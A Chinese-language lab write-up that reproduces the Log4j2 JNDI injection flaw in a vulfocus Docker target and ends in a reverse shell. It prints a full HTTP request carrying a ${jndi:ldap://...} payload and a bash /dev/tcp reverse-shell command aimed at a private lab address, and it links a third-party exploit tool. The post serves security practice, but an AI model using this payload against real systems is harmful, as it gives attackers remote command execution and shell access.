log4j2核弹级漏洞靶场复现(反弹shell)

环境搭建:

本次漏洞复现采用vulfocus的log4j2靶场docker

使用Kali系统进行复现实验

搭建docker拉取漏洞镜像可参考以下链接:

https://blog.csdn.net/weixin_47019868/article/details/122010972

log4漏洞镜像

log4j2核弹级漏洞靶场复现(反弹shell)_第1张图片

启动环境

log4j2核弹级漏洞靶场复现(反弹shell)_第2张图片

漏洞验证:

log4j2核弹级漏洞靶场复现(反弹shell)_第3张图片

dnslog回显则漏洞存在

 log4j2核弹级漏洞靶场复现(反弹shell)_第4张图片

漏洞利用:

接下来利用漏洞反弹shell,这里用的是大佬的exp,百度云链接如下:

链接:https://pan.baidu.com/s/1ABBPDmtMQktehVBt5MYwvg 
提取码:gr3n

kali攻击机启动ldap服务和http服务

burpsuite构造payload

POST /hello HTTP/1.1
Host: 192.168.10.244:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://192.168.10.244:8080
Connection: close
Referer: http://192.168.10.244:8080/hello
Upgrade-Insecure-Requests: 1
cmd:/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.244/1234 0>&1'

payload=${jndi:ldap://192.168.10.244:3456/TomcatBypass/TomcatEcho}

监听1234端口

log4j2核弹级漏洞靶场复现(反弹shell)_第5张图片

发包返回200

log4j2核弹级漏洞靶场复现(反弹shell)_第6张图片

反弹成功!!!

log4j2核弹级漏洞靶场复现(反弹shell)_第7张图片

参考链接:

https://www.cnblogs.com/huaflwr/p/15679365.html

 https://blog.csdn.net/isxiaole/article/details/121912039

 

你可能感兴趣的:(笔记,log4j2,安全漏洞)